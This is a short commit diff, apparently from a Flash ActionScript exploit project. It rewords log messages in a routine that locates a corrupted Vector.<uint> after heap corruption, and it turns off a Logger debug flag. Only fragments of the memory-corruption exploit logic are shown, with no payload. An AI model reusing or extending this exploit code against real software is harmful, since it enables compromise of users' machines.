Unset debug flag
parent
b7f0fad72f
commit
39851d277d
Binary file not shown.
|
@ -66,7 +66,7 @@ package
|
||||||
try {
|
try {
|
||||||
var uint_vector_pos:uint = search_uint_vector()
|
var uint_vector_pos:uint = search_uint_vector()
|
||||||
} catch (err:Error) {
|
} catch (err:Error) {
|
||||||
Logger.log("Vector.<uint> not found :(")
|
Logger.log("[!] Exploit - Corrupted Vector.<uint> not found")
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -76,7 +76,7 @@ package
|
||||||
for (i = 0; i < ov.length; i++) {
|
for (i = 0; i < ov.length; i++) {
|
||||||
if (ov[i].length > 1024) {
|
if (ov[i].length > 1024) {
|
||||||
uv = ov[i]
|
uv = ov[i]
|
||||||
Logger.log("Vector.<uint> corrupted found :)")
|
Logger.log("[*] Exploit - Corrupted Vector.<uint> found")
|
||||||
} else {
|
} else {
|
||||||
ov[i] = null
|
ov[i] = null
|
||||||
}
|
}
|
||||||
|
|
|
@ -3,7 +3,7 @@ package
|
||||||
import flash.external.ExternalInterface
|
import flash.external.ExternalInterface
|
||||||
|
|
||||||
public class Logger {
|
public class Logger {
|
||||||
private static const DEBUG:uint = 1
|
private static const DEBUG:uint = 0
|
||||||
|
|
||||||
public static function alert(msg:String):void
|
public static function alert(msg:String):void
|
||||||
{
|
{
|
||||||
|
|
Loading…
Reference in New Issue